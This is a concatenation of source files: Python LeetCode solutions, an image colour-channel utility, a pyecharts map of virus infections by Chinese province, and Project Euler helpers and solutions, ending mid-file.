self.ans = max(self.ans, lh + rh)
return max(lh, rh) + 1
# @lc code=end
```
#### File: leetcode/Python3/56.merge-intervals.py
```python
class Solution:
def merge(self, intervals):
if intervals == []:
return []
self.ans = []
intervals.sort()
self.helper(intervals[0][0], intervals[0][1], 0, intervals)
return self.ans
def helper(self, start, end, index, intervals):
for i in range(index, len(intervals)):
if intervals[i][0] > end:
self.ans.append([start, end])
return self.helper(intervals[i][0], intervals[i][1], i, intervals)
else:
start = min(start, intervals[i][0])
end = max(end, intervals[i][1])
self.ans.append([start, end])
# @lc code=end
```
#### File: leetcode/Python3/572.subtree-of-another-tree.py
```python
class Solution:
def isSubtree(self, s, t):
if not s and not t:
return True
if not s or not t:
return False
return self.compare(s, t) or self.isSubtree(s.left, t) or self.isSubtree(s.right, t)
def compare(self, s, t):
if not s and not t:
return True
if not s or not t:
return False
return s.val == t.val and self.compare(s.right, t.right) and self.compare(s.left, t.left)
# @lc code=end
```
#### File: leetcode/Python3/57.insert-interval.py
```python
class Solution:
def insert(self, intervals, newInterval):
"""
:type intervals: List[Interval]
:type newInterval: Interval
:rtype: List[Interval]
"""
start = newInterval[0]
end = newInterval[1]
left, right = [], []
for interval in intervals:
if start > interval[1]:
left.append(interval)
elif end < interval[0]:
right.append(interval)
else:
start = min(start, interval[0])
end = max(end, interval[1])
return left + [[start, end]] + right
# @lc code=end
```
#### File: leetcode/Python3/582.kill-process.py
```python
import collections
# @lc code=start
class Solution:
def killProcess(self, pid: List[int], ppid: List[int], kill: int):
children = collections.defaultdict(list)
for i in range(len(pid)):
children[ppid[i]].append(pid[i])
todo_ls = []
todo_ls.append(kill)
ans = []
while todo_ls:
temp_saver = []
while todo_ls:
curval = todo_ls.pop()
if curval in children:
temp_saver += children[curval]
ans.append(curval)
todo_ls = temp_saver
return ans
# @lc code=end
```
#### File: leetcode/Python3/599.minimum-index-sum-of-two-lists.py
```python
class Solution:
def findRestaurant(self, list1, list2):
if not list1 or not list2:
return []
both_like = set()
d = dict()
for i in range(len(list1)):
d[list1[i]] = i
for j in range(len(list2)):
if list2[j] in d:
both_like.add(list2[j])
d[list2[j]] += j
if not both_like:
return []
indexes = [val for key, val in d.items() if key in both_like]
mi_index = min(indexes)
answer = []
for key, val in d.items():
if val == mi_index and key in both_like:
answer.append(key)
return answer
if __name__ == '__main__':
a = Solution()
b = a.findRestaurant(["Shogun", "Tapioca Express", "Burger King", "KFC"],["Piatti", "The Grill at Torrey Pines", "Hungry Hunter Steakhouse", "Shogun"])
print(b)
# @lc code=end
```
#### File: leetcode/Python3/5.longest-palindromic-substring.py
```python
class Solution:
def longestPalindrome(self, s: str) -> str:
if len(s) <= 1000:
res = ''
if len(s) == 1:
return s[0]
for i in range(len(s)):
                res1 = self.anchor(i, i, s)
                res2 = self.anchor(i, i + 1, s)
if len(res1) > len(res):
res = res1
if len(res2) > len(res):
res = res2
return res
    def anchor(self, start, end, string):
l= len(string)
while start >= 0 and end < l and string[start] == string[end]:
start = start - 1
end = end + 1
return string[start + 1: end]
# @lc code=end
```
#### File: leetcode/Python3/632.smallest-range-covering-elements-from-k-lists.py
```python
class Solution:
    def smallestRange(self, nums: List[List[int]]) -> List[int]:
        # the body was missing in the source; a standard k-pointer min-heap sketch is filled in here
        import heapq
        heap = [(row[0], i, 0) for i, row in enumerate(nums)]
        heapq.heapify(heap)
        cur_max = max(row[0] for row in nums)
        best = [heap[0][0], cur_max]
        while True:
            val, i, j = heapq.heappop(heap)
            if cur_max - val < best[1] - best[0]:
                best = [val, cur_max]
            if j + 1 == len(nums[i]):
                return best
            nxt = nums[i][j + 1]
            cur_max = max(cur_max, nxt)
            heapq.heappush(heap, (nxt, i, j + 1))
# @lc code=end
```
#### File: leetcode/Python3/63.unique-paths-ii.py
```python
class Solution:
def uniquePathsWithObstacles(self, obstacleGrid):
if obstacleGrid[0][0] == 1:
return 0
if len(obstacleGrid) == 1:
for item in obstacleGrid[0]:
if item == 1:
return 0
return 1
        if len(obstacleGrid[0]) == 1:  # single-column grid
for item in obstacleGrid:
if item == [1]:
return 0
return 1
n = len(obstacleGrid)
m = len(obstacleGrid[0])
mat = [[0] * m for _ in range(n)]
mat[0][0] = 1
for i in range(1, m):
if obstacleGrid[0][i] == 1:
break
else:
mat[0][i] = mat[0][i-1]
for j in range(1, n):
if obstacleGrid[j][0] == 1:
break
else:
mat[j][0] = mat[j - 1][0]
for i in range(1, m):
for j in range(1, n):
if obstacleGrid[j][i] == 0:
mat[j][i] = mat[j-1][i] + mat[j][i-1]
else:
                    mat[j][i] = 0
return mat[n-1][m-1]
# @lc code=end
```
#### File: leetcode/Python3/645.set-mismatch.py
```python
import collections
class Solution:
def findErrorNums(self, nums: List[int]) -> List[int]:
ans = []
d = collections.Counter(nums)
for k, v in d.items():
if v == 2:
ans.append(k)
break
num_set = set(nums)
full = {i for i in range(1, len(nums) + 1)}
ans += list(full - num_set)
return ans
# @lc code=end
```
#### File: leetcode/Python3/647.palindromic-substrings.py
```python
class Solution:
    # Q: what is your def of a palindromic string? Would you give me a few more examples?
# Q: You just want the number of valid substring or you want me to return or yield all the valid strings?
# Q: edge case: what should we return if the given string is empty, or no palindromic substring in the given string? None or 0?
# version 1: the way that is slow but straight and it works.
# def countSubstrings(self, s):
# """
# main function
# :type s: String
# :rtype: Int, number of valid substrings.
# """
# ans = 0
# for i in range(len(s)):
# p1 = i
# p2 = i
# while p2 >= 0 and p1 < len(s):
# if s[p1] == s[p2]:
# ans += 1
# p1 += 1
# p2 -= 1
# else:
# break
# p3 = i
# p4 = i - 1
# while p4 >= 0 and p3 < len(s):
# if s[p3] == s[p4]:
# ans += 1
# p3 += 1
# p4 -= 1
# else:
# break
# # time comp: O(n^2)
# return ans
# version 2
def countSubstrings(self, s):
"""
main function
:type s: String
:rtype: Int, number of valid substrings.
"""
s = "~#" + '#'.join(s) + '#!'
# dp: record the longest palindromic string radius in the current position
dp = [0] * len(s)
center = right = 0
for i in range(1, len(s) - 1):
if i < right:
dp[i] = min(right - i, dp[2 * center - i])
while s[i + dp[i] + 1] == s[i - dp[i] - 1]:
dp[i] += 1
if i + dp[i] > right:
center = i
right = dp[i] + i
return sum((l + 1)//2 for l in dp)
# a = Solution()
# b = a.countSubstrings("aaa")
# print(b)
# @lc code=end
```
#### File: leetcode/Python3/659.split-array-into-consecutive-subsequences.py
```python
import collections
import heapq
class Solution:
def isPossible(self, nums):
lists = collections.defaultdict(list)
for num in nums:
prelens = lists[num - 1]
if not prelens:
prelen = 0
else:
prelen = heapq.heappop(prelens)
cur = lists[num]
heapq.heappush(cur,prelen + 1)
lists[num] = cur
for values in lists.values():
for v in values:
if v < 3:
return False
return True
# if __name__ == '__main__':
# a = Solution()
# b = a.isPossible([1,2,3,4,4,5])
# print(b)
# @lc code=end
```
#### File: leetcode/Python3/678.valid-parenthesis-string.py
```python
class Solution:
def checkValidString(self, s):
left = 0
right = 0
for item in s:
if item == '(' or item =='*':
left += 1
else:
left -= 1
if left < 0:
return False
if left == 0:
return True
for i in range(len(s) - 1, -1, -1):
if s[i] == ')' or s[i] == '*':
right += 1
else:
right -= 1
if right < 0:
return False
return True
# @lc code=end
```
#### File: leetcode/Python3/687.longest-univalue-path.py
```python
from collections import deque
def construct_tree(values):
if not values:
return None
root = TreeNode(values[0])
queue = deque([root])
leng = len(values)
nums = 1
while nums < leng:
node = queue.popleft()
if node:
node.left = TreeNode(values[nums]) if values[nums] else None
queue.append(node.left)
if nums + 1 < leng:
node.right = TreeNode(values[nums+1]) if values[nums+1] else None
queue.append(node.right)
nums += 1
nums += 1
return root
# Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def longestUnivaluePath(self, root):
if not root:
return 0
self.mx = 0
self.finder(root)
return self.mx
def finder(self,root):
if not root:
return 0
left = self.finder(root.left)
right = self.finder(root.right)
l = 0
r = 0
# do not use left += 1
if root.left and root.left.val == root.val:
l = left + 1
if root.right and root.right.val == root.val:
r = right + 1
self.mx = max(self.mx, l + r)
return max(l, r)
if __name__ == '__main__':
tree = construct_tree([5,4,5,1,1,5])
b = Solution()
c = b.longestUnivaluePath(tree)
print(c)
# @lc code=end
```
#### File: leetcode/Python3/696.count-binary-substrings.py
```python
class Solution:
def countBinarySubstrings(self, s):
"""
:type s: str
:rtype: int
"""
result = 0
prev_length = 0
cur_length = 1
for i in range(1, len(s)):
if (s[i] == s[i - 1]):
cur_length += 1
else:
prev_length = cur_length
cur_length = 1
if prev_length >= cur_length:
result += 1
return result
# @lc code=end
```
#### File: leetcode/Python3/708.insert-into-a-sorted-circular-linked-list.py
```python
class Solution:
def insert(self, head: 'Node', insertVal: int) -> 'Node':
cur = None
next_ = None
min_head = None
if not head:
head = Node(insertVal)
head.next = head
return head
cur = head
next_ = head.next
while cur.val <= next_.val:
cur = cur.next
next_ = next_.next
if cur == head:
break
min_head = next_
while next_.val < insertVal:
cur = next_
next_ = next_.next
if next_ == min_head:
break
cur.next = Node(insertVal)
cur = cur.next
cur.next = next_
return head
# @lc code=end
```
#### File: leetcode/Python3/713.subarray-product-less-than-k.py
```python
import collections
class Solution:
def numSubarrayProductLessThanK(self, nums, k):
if len(nums) == 1:
if nums[0] < k:
return 1
return 0
mult = 1
l = 0
r = 0
ans = 0
for r in range(len(nums)):
mult *= nums[r]
while l <= r and mult >= k:
mult //= nums[l]
l += 1
ans += r - l + 1
return ans
if __name__ == '__main__':
a = Solution()
b = a.numSubarrayProductLessThanK([10, 5, 2, 6], 100)
print(b)
# @lc code=end
```
#### File: leetcode/Python3/732.my-calendar-iii.py
```python
class Node:
def __init__(self, start, end, count):
self.left = None
self.right = None
self.start = start
self.end = end
self.multi = count
class MyCalendarThree:
def __init__(self):
self.root = None
self.mx = 1
def tree_helper(self, root, start, end, currentheight):
if root is None:
return Node(start, end, currentheight)
if start >= root.end:
root.right = self.tree_helper(root.right, start, end, currentheight)
elif end <= root.start:
root.left = self.tree_helper(root.left, start, end, currentheight)
else:
rgs = sorted([root.start, root.end, start, end])
cur_l, cur_r = root.start, root.end
root.start, root.end = rgs[1], rgs[2]
root.left = self.tree_helper(root.left, rgs[0], rgs[1], currentheight if start < cur_l else root.multi)
root.right = self.tree_helper(root.right, rgs[2], rgs[3], currentheight if end > cur_r else root.multi)
root.multi += currentheight
self.mx = max(self.mx, root.multi)
return root
def book(self, start: int, end: int):
self.root = self.tree_helper(self.root, start, end, 1)
return self.mx
# Your MyCalendarThree object will be instantiated and called as such:
# obj = MyCalendarThree()
# param_1 = obj.book(start,end)
# @lc code=end
```
#### File: leetcode/Python3/741.cherry-pickup.py
```python
class Solution:
def cherryPickup(self, grid: List[List[int]]) -> int:
n = len(grid)
from functools import lru_cache
#max cherries from (x1, y1) to (0, 0) + (x2, y2) to (0, 0)
@lru_cache(None)
def dp(x1, y1, x2):
y2 = x1 + y1 - x2
if x1 < 0 or y1 < 0 or x2 < 0 or y2 < 0: return -1
if grid[x1][y1] < 0 or grid[x2][y2] < 0: return -1
if x1 == 0 and y1 == 0: return grid[x1][y1]
ans = max(dp(x1-1, y1, x2-1), dp(x1, y1-1, x2-1),
dp(x1-1, y1, x2), dp(x1, y1-1, x2))
if ans < 0: return -1
ans += grid[x1][y1]
if x1 != x2:
ans += grid[x2][y2]
return ans
return max(0, dp(n-1, n-1, n-1))
# @lc code=end
```
#### File: leetcode/Python3/742.closest-leaf-in-a-binary-tree.py
```python
# def tree_builder(values):
# if not values:
# return None
# root = TreeNode(values[0])
# queue = collections.deque([root])
# leng = len(values)
# nums = 1
# while nums < leng:
# node = queue.popleft()
# if node:
# node.left = TreeNode(values[nums]) if values[nums] else None
# queue.append(node.left)
# if nums + 1 < leng:
# node.right = TreeNode(values[nums+1]) if values[nums+1] else None
# queue.append(node.right)
# nums += 1
# nums += 1
# return root
# if __name__ == '__main__':
# a = Solution()
# tree = tree_builder([1,2,3,4, None, None, None, 5, None,6])
# b = a.findClosestLeaf(tree, 2)
# print(b)
class Solution(object):
def findClosestLeaf(self, root, k):
"""
:type root: TreeNode
:type k: int
:rtype: int
"""
parents = {}
leaves = []
self.knode = None
def traverse(root):
if root.val == k: self.knode = root
if not root.left and not root.right:
leaves.append(root)
return
for child in (root.left, root.right):
if not child: continue
traverse(child)
parents[child.val] = root
def findParents(node):
ans = [node.val]
while node.val in parents:
node = parents[node.val]
ans.append(node.val)
return ans
traverse(root)
kParents = findParents(self.knode)
ans, dist = None, 0x7FFFFFFF
for leaf in leaves:
leafParents = findParents(leaf)
cross = [n for n in leafParents if n in kParents][0]
ndist = leafParents.index(cross) + kParents.index(cross)
if ndist < dist:
dist = ndist
ans = leaf
return ans.val
# @lc code=end
```
#### File: leetcode/Python3/744.find-smallest-letter-greater-than-target.py
```python
import heapq
class Solution:
def nextGreatestLetter(self, letters, target):
curheap = []
heapq.heappush(letters, target)
for letter in letters:
heapq.heappush(curheap, letter)
head = heapq.heappop(curheap)
if head == target:
nxt = heapq.heappop(curheap)
while nxt == head and curheap:
nxt = heapq.heappop(curheap)
return nxt
tar = heapq.heappop(curheap)
while tar != target:
tar = heapq.heappop(curheap)
if not curheap:
return head
ans = heapq.heappop(curheap)
while ans == target and curheap:
ans = heapq.heappop(curheap)
if ans == target:
return head
return ans
# if __name__ == '__main__':
# a = Solution()
# b = a.nextGreatestLetter(["c","f","j"], "g")
# print(b)
# @lc code=end
```
#### File: leetcode/Python3/746.min-cost-climbing-stairs.py
```python
class Solution:
def minCostClimbingStairs(self, cost):
"""
:type cost: List[int]
:rtype: int
"""
N = len(cost)
cost.append(0)
dp = [0] * (N + 1)
dp[0] = cost[0]
dp[1] = cost[1]
for i in range(2, N + 1):
dp[i] = min(dp[i - 1], dp[i - 2]) + cost[i]
return dp[-1]
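# quick sanity check (example from the problem statement): start on index 1, pay 15, jump to the top
# a = Solution()
# print(a.minCostClimbingStairs([10, 15, 20]))   # expected 15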
# @lc code=end
```
#### File: leetcode/Python3/779.k-th-symbol-in-grammar.py
```python
class Solution(object):
def kthGrammar(self, N, K):
"""
:type N: int
:type K: int
:rtype: int
"""
if N == 1: return 0
if K == 2: return 1
if K <= 1 << N - 2: return self.kthGrammar(N - 1, K)
K -= 1 << N - 2
return 1 - self.kthGrammar(N - 1, K)
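# quick sanity check: row 3 of the grammar is "0110", so the 2nd symbol is 1
# a = Solution()
# print(a.kthGrammar(3, 2))   # expected 1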
# @lc code=end
```
#### File: leetcode/Python3/789.escape-the-ghosts.py
```python
class Solution:
def escapeGhosts(self, ghosts: List[List[int]], target: List[int]):
my_dist = abs(target[0]) + abs(target[1])
for ghost in ghosts:
curdist = abs(ghost[0] - target[0]) + abs(ghost[1] - target[1])
            if curdist <= my_dist:  # a ghost arriving no later than you blocks the escape
return False
return True
# @lc code=end
```
#### File: leetcode/Python3/79.word-search.py
```python
class Solution:
def exist(self, board, word):
start = [None, None]
h = len(board)
l = len(board[0])
walked = [[0] * l for _ in range(h)]
for i in range(h):
for j in range(l):
if board[i][j] == word[0]:
start = [i, j]
walked[i][j] = 1
if self.helper(word[1:], board, walked, start):
return True
walked[i][j] = 0
return False
def helper(self, rest, board, walked, current_pos):
if len(rest) == 0:
return True
i = current_pos[0]
j = current_pos[1]
if i > 0 and board[i - 1][j] == rest[0] and walked[i - 1][j] == 0:
walked[i - 1][j] = 1
if self.helper(rest[1:], board, walked, [i - 1, j]):
return True
walked[i - 1][j] = 0
if i < len(board) - 1 and board[i + 1][j] == rest[0] and walked[i + 1][j] == 0:
walked[i + 1][j] = 1
if self.helper(rest[1:], board, walked, [i + 1, j]):
return True
walked[i + 1][j] = 0
if j > 0 and board[i][j - 1] == rest[0] and walked[i][j - 1] == 0:
walked[i][j - 1] = 1
if self.helper(rest[1:], board, walked, [i, j - 1]):
return True
walked[i][j - 1] = 0
if j < len(board[0]) - 1 and board[i][j + 1] == rest[0] and walked[i][j + 1] == 0:
walked[i][j + 1] = 1
if self.helper(rest[1:], board, walked, [i, j + 1]):
return True
walked[i][j + 1] = 0
return False
# @lc code=end
```
#### File: leetcode/Python3/809.expressive-words.py
```python
class Solution(object):
def expressiveWords(self, S, words):
"""
:type S: str
:type words: List[str]
:rtype: int
"""
if not S:
return 0
ans = 0
set_S = set(S)
S_list = []
pre_s, pre_index = S[0], 0
for i, s in enumerate(S):
if pre_s != s:
S_list.append(S[pre_index:i])
pre_s, pre_index = s, i
if i == len(S) - 1:
S_list.append(S[pre_index:])
for word in words:
if set(word) != set_S:
continue
word_list = []
pre_w, pre_index = word[0], 0
for i, w in enumerate(word):
if pre_w != w:
word_list.append(word[pre_index:i])
pre_w, pre_index = w, i
if i == len(word) - 1:
word_list.append(word[pre_index:])
if len(S_list) == len(word_list):
if all(S_list[i] == word_list[i] if len(S_list[i]) < 3 else len(S_list[i]) >= len(word_list[i]) for i in range(len(S_list))):
ans += 1
return ans
# @lc code=end
```
#### File: leetcode/Python3/811.subdomain-visit-count.py
```python
import collections
class Solution:
def subdomainVisits(self, cpdomains: List[str]) -> List[str]:
if not cpdomains:
return []
d = collections.defaultdict(int)
for item in cpdomains:
time, domain = item.split(' ')
time = int(time)
subdo = domain.split('.')
pointer = len(subdo) - 1
while pointer >= 0:
curstr = '.'.join(subdo[pointer:])
d[curstr] += time
pointer -= 1
ans = []
for key, val in d.items():
ans.append(str(val) + ' ' + key)
return ans
# @lc code=end
```
#### File: leetcode/Python3/82.remove-duplicates-from-sorted-list-ii.py
```python
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution:
def deleteDuplicates(self, head):
fakehead = pre = ListNode(0)
fakehead.next = head
while head and head.next:
if head.val == head.next.val:
while head and head.next and head.val == head.next.val:
head = head.next
head = head.next
pre.next = head
else:
head = head.next
pre = pre.next
return fakehead.next
# @lc code=end
```
#### File: leetcode/Python3/838.push-dominoes.py
```python
class Solution:
def pushDominoes(self, dominoes: str) -> str:
l = 0
ans = []
dominoes = 'L' + dominoes + 'R'
for r in range(1, len(dominoes)):
if dominoes[r] == '.':
continue
cnt = r - l - 1
if l > 0:
ans.append(dominoes[l])
if dominoes[l] == dominoes[r]:
ans.append(dominoes[l] * cnt)
elif dominoes[l] == 'L' and dominoes[r] == 'R':
ans.append('.' * cnt)
else:
ans.append('R' * (cnt // 2) + '.' * (cnt % 2) + 'L' * (cnt // 2))
l = r
return ''.join(ans)
if __name__ == '__main__':
a = Solution()
b = a.pushDominoes(".L.R...LR..L..")
print(b)
# @lc code=end
```
#### File: leetcode/Python3/872.leaf-similar-trees.py
```python
class Solution:
def leafSimilar(self, root1: TreeNode, root2: TreeNode):
if not root1 and not root2:
return True
if not root1 or not root2:
return False
t1 = []
t2 = []
self.get_leafs(root1, t1)
self.get_leafs(root2, t2)
return t1 == t2
def get_leafs(self, root, curset):
if not root.left and not root.right:
curset.append(root.val)
if root.left:
self.get_leafs(root.left, curset)
if root.right:
self.get_leafs(root.right, curset)
# @lc code=end
```
#### File: leetcode/Python3/938.range-sum-of-bst.py
```python
class Solution:
def rangeSumBST(self, root: TreeNode, L: int, R: int) -> int:
self.ans = 0
self.finder(root, L, R)
return self.ans
def finder(self, root, l, r):
if not root:
return
if l <= root.val <= r:
self.ans += root.val
if root.val >= r:
self.finder(root.left, l, r)
elif root.val <= l:
self.finder(root.right, l, r)
else:
self.finder(root.left, l, r)
self.finder(root.right, l, r)
# @lc code=end
```
#### File: leetcode/Python3/953.verifying-an-alien-dictionary.py
```python
class Solution(object):
def isAlienSorted(self, words, order):
"""
:type words: List[str]
:type order: str
:rtype: bool
"""
N = len(words)
d = {c : i for i, c in enumerate(order)}
for i in range(N - 1):
pre, after = words[i], words[i + 1]
if pre == after: continue
_len = min(len(pre), len(after))
for j in range(_len):
if d[pre[j]] < d[after[j]]:
break
elif d[pre[j]] > d[after[j]]:
return False
if len(pre) > len(after) and pre[:_len] == after:
return False
return True
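# quick sanity check (example from the problem statement):
# a = Solution()
# print(a.isAlienSorted(["hello", "leetcode"], "hlabcdefgijkmnopqrstuvwxyz"))   # expected True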
# @lc code=end
```
#### File: leetcode/Python3/957.prison-cells-after-n-days.py
```python
import copy
class Solution(object):
def prisonAfterNDays(self, oldcells, N):
"""
:type cells: List[int]
:type N: int
:rtype: List[int]
"""
cells = copy.deepcopy(oldcells)
count = 0
N %= 14
if N == 0:
N = 14
while count < N:
newCell = [0] * 8
for i in range(1, 7):
if cells[i - 1] == cells[i + 1]:
newCell[i] = 1
else:
newCell[i] = 0
cells = newCell
count += 1
return cells
# @lc code=end
```
#### File: leetcode/Python3/96.unique-binary-search-trees.py
```python
class Solution:
def numTrees(self, n: int):
        if n < 2:
            return n
        # dp[i] = number of structurally unique BSTs with i nodes (Catalan recurrence);
        # the original body stopped here, so the standard fill-in is completed below
        dp = [0] * (n + 1)
        dp[0] = dp[1] = 1
        for i in range(2, n + 1):
            for j in range(i):
                dp[i] += dp[j] * dp[i - 1 - j]
        return dp[n]
# @lc code=end
```
#### File: leetcode/Python3/993.cousins-in-binary-tree.py
```python
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def isCousins(self, root: TreeNode, x: int, y: int):
pre = 0
curval = 0
self.x = x
self.y = y
self.xdetail = []
self.ydetail = []
self.finder(0, 0, root)
if not self.xdetail or not self.ydetail:
return False
if self.xdetail[0] == self.ydetail[0]:
return False
if self.xdetail[1] != self.ydetail[1]:
return False
return True
def finder(self, pre, level, node):
if not node:
return
if not self.xdetail or not self.ydetail:
if node.val == self.x:
self.xdetail = [pre, level]
elif node.val == self.y:
self.ydetail = [pre, level]
else:
self.finder(node.val, level + 1, node.left)
self.finder(node.val, level + 1, node.right)
# @lc code=end
```
#### File: leetcode/Python3/tree_generator.py
```python
import collections
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
def tree_builder(values):
if not values:
return None
root = TreeNode(values[0])
queue = collections.deque([root])
leng = len(values)
nums = 1
while nums < leng:
node = queue.popleft()
if node:
node.left = TreeNode(values[nums]) if values[nums] else None
queue.append(node.left)
if nums + 1 < leng:
node.right = TreeNode(values[nums+1]) if values[nums+1] else None
queue.append(node.right)
nums += 1
nums += 1
return root
if __name__ == '__main__':
a = tree_builder([1,None,2,2])
print(a)
``` |
{
"source": "610yilingliu/simi_pic_detection",
"score": 3
} |
#### File: simi_pic_detection/pic_analyzer_python/image.py
```python
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
import cv2
import os
class input_img(object):
def __init__(self, pic_path):
self.__path = pic_path
self.__image = Image.open(pic_path)
self.__rgb_np = np.array(self.__image)
self.__name = os.path.basename(pic_path)
self.__hsv = cv2.cvtColor(self.__rgb_np, cv2.COLOR_RGB2HSV)
self.__hsv_np = np.array(self.__hsv)
def get_name(self):
return self.__name
def get_image(self):
return self.__image
def getrgb_np(self):
return self.__rgb_np
def getpath(self):
return self.__path
def getRchannel(self):
rgb_np = self.__rgb_np
R = rgb_np[:,:,0]
return R
def getGchannel(self):
rgb_np = self.__rgb_np
G = rgb_np[:,:,1]
return G
def getBchannel(self):
rgb_np = self.__rgb_np
B = rgb_np[:,:,2]
return B
def gethsv(self):
return self.__hsv
def gethsv_np(self):
return self.__hsv_np
def getHchannel(self):
hsv_np = self.__hsv_np
return hsv_np[:,:,0]
def getSchannel(self):
hsv_np = self.__hsv_np
return hsv_np[:,:,1]
def getVchannel(self):
hsv_np = self.__hsv_np
return hsv_np[:,:,2]
def getgrayimage(self):
img = self.__rgb_np
gray_img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
out_img = cv2.cvtColor(gray_img, cv2.COLOR_GRAY2RGB)
return out_img
def getbwimages(self, thresholds = [40, 80, 120, 160, 200]):
gray_img = cv2.cvtColor(self.getgrayimage(), cv2.COLOR_RGB2GRAY)
bw_dic = dict()
for i in range(len(thresholds)):
bw = cv2.threshold(gray_img, thresholds[i], 255, cv2.THRESH_BINARY)[1]
bw_dic['bw' + str(i)] = cv2.cvtColor(bw, cv2.COLOR_GRAY2RGB)
return bw_dic
def showimg(image):
plt.imshow(image)
plt.show()
if __name__ == '__main__':
p = input_img('../pics/raw_1.jpg')
G = p.getGchannel()
B = p.getBchannel()
R = p.getSchannel()
showimg(R)
``` |
{
"source": "610yilingliu/WuhanVirus_analyze",
"score": 3
} |
#### File: 610yilingliu/WuhanVirus_analyze/analyze.py
```python
from pyecharts.charts import Map
from pyecharts import options as opts
import pandas as pd
import numpy as np
from math import log10
def standardlize(data, max, min):
if data != 0:
return log10(data)/log10(max-min)
return 0
en_to_zhcn = {
'Hubei': '湖北',
'Beijing': '北京',
'Guangdong': '广东',
'Shanghai': '上海',
'Zhejiang': '浙江',
'Yunnan': '云南',
'Sichuan': '四川',
'Shandong': '山东',
'Guangxi': '广西',
'Guizhou': '贵州',
'Anhui': '安徽',
'Hainan': '海南',
'Ningxia':'宁夏',
'Jilin':'吉林',
'Jiangxi':'江西',
'Tianjin':'天津',
'Henan':'河南',
'Chongqing': '重庆',
'Shanxi': '山西',
'Heilongjiang': '黑龙江',
'Hunan': '湖南',
'Liaoning':'辽宁',
'Macau':'澳门',
'Taiwan':'台湾',
'Fujian':'福建',
'Hongkong':'香港',
'Hebei': '河北',
'Inner Mongolia': '内蒙古',
'Jiangsu': '江苏',
'Shaanxi': '陕西',
'Xinjiang': '新疆',
'Gansu': '甘肃',
'Qinghai': '青海',
'Tibet':'西藏',
}
virus_data = pd.read_csv('virus_data_1.26.csv')
# Translate to Chinese
virus_data['Region_zhcn'] = virus_data['Region']
# Series.replace with a dict maps every value in one pass; no per-row loop is needed
virus_data['Region_zhcn'].replace(en_to_zhcn, inplace = True)
name = list(virus_data['Region_zhcn'])
infected_data = list(virus_data['Infected'])
standardlized = []
for i in range(len(infected_data)):
standardlized.append(standardlize(infected_data[i], max(infected_data), min(infected_data)))
mapping = [[name[i], standardlized[i]] for i in range(len(name))]
infected_map = Map()
infected_map.set_series_opts(
label_opts=opts.LabelOpts(is_show=False),
)
infected_map.set_global_opts(
title_opts=opts.TitleOpts(title="People infected from Wuhan Virus"),
visualmap_opts=opts.VisualMapOpts(
is_show = False,
max_= max(standardlized),
range_text=["max", "min"],
range_size= 1
),
legend_opts=opts.LegendOpts(is_show = False),
)
infected_map.add(" ", mapping, maptype = "china")
infected_map.render_notebook()
infected_map.render('map.html')
``` |
{
"source": "6112/project-euler",
"score": 4
} |
#### File: project-euler/helpers/sequence.py
```python
def permutations (tokens):
"""Used as an iterator for all the permutations of a sequence."""
if not tokens:
yield []
return
encountered = set ()
for index, first in enumerate (tokens):
if first not in encountered:
rest = tokens [: index] + tokens [index + 1:]
encountered.add(first)
for permutation in permutations (rest):
yield [first] + permutation
def n_permutations(tokens, n):
"""Used as an iterator for all n-permutations of a sequence."""
if not tokens:
yield []
return
if n == 0:
yield []
return
encountered = set()
for index, first in enumerate(tokens):
if first not in encountered:
rest = tokens[: index] + tokens[index + 1 :]
encountered.add(first)
for perm in n_permutations(rest, n - 1):
yield [first] + perm
def take_n(tokens, n):
"""Used as an iterator for all possible combinations of n elements from
tokens."""
if not tokens:
yield []
return
if n == 0:
yield []
return
encountered = set()
for index, first in enumerate(tokens):
if first not in encountered:
rest = tokens[index + 1 :]
encountered.add(first)
if n == 1:
yield [first]
else:
for perm in take_n(rest, n - 1):
if perm:
yield [first] + perm
def is_permutation(xs, ys):
"""Returns True iff the two lists are permutations of eachother."""
return sorted(xs) == sorted(ys)
def left_truncations (tokens):
"""Used as an iterator for all truncations of a sequence, from the left.
For instance, left_truncations('123') yields '123', '12', and '1'."""
while tokens:
yield tokens
tokens = tokens [: -1]
def right_truncations (tokens):
"""Used as an iterator for all truncations of a sequence, from the right.
For instance, right_truncations('123' yields '123', '23', and '3'."""
while tokens:
yield tokens
tokens = tokens [1 :]
def rotate (tokens):
"""Returns a rotated sequence from the given sequence. All elements are
moved one position to the right, and the last element is placed at the
beginning."""
return tokens [-1 :] + tokens [: -1]
def rotations (tokens):
"""Used as an iterator for all rotations of a sequence, as per the rotate()
function."""
rotation = tokens
for iterator in range (len (tokens)):
yield rotation
rotation = rotate (rotation)
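# usage sketch (illustrative examples, assuming the functions above are imported):
# >>> list(permutations([1, 1, 2]))
# [[1, 1, 2], [1, 2, 1], [2, 1, 1]]
# >>> list(rotations('abc'))
# ['abc', 'cab', 'bca']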
```
#### File: project-euler/problems/013.py
```python
import helpers.file as fileutils
def euler():
# read the file
numbers = fileutils.flattened_list_from_file('data/013.txt')
# return the first ten digits of the sum of the numbers
return str(sum(numbers)) [:10]
```
#### File: project-euler/problems/015.py
```python
GRID_SIZE = 21
def euler():
# construct the 21x21 grid, whose elements are the number of possible paths
# to reach that cell
grid = [[0 for y in range(GRID_SIZE)] for x in range(GRID_SIZE)]
# initialize the top and left borders with 1 everywhere
for i in range(GRID_SIZE):
grid [i][0] = 1
grid [0][i] = 1
# for each grid cell
for y in range(1, GRID_SIZE):
for x in range(1, GRID_SIZE):
# this grid is equal to the sum of the one above it, and the one to
# its left
grid [y][x] = grid [y - 1][x] + grid [y][x - 1]
# return the value of the last grid
return grid [GRID_SIZE - 1][GRID_SIZE - 1]
```
#### File: project-euler/problems/017.py
```python
import re
MAX = 1000
def euler():
# accumulator for the number of letters used
accumulator = 0
# for each number in the given range
for number in range(1, MAX + 1):
# get the number's name
name = number_name(number)
# remove the whitespace and dashes
name = re.sub('\\s|-', '', name)
        # add the length of the name to the number of letters used
accumulator += len(name)
# return the number of letters used
return accumulator
# used for direct access to some number names
number_name_dictionary = {
0: 'zero',
1: 'one',
2: 'two',
3: 'three',
4: 'four',
5: 'five',
6: 'six',
7: 'seven',
8: 'eight',
9: 'nine',
10: 'ten',
11: 'eleven',
12: 'twelve',
13: 'thirteen',
15: 'fifteen',
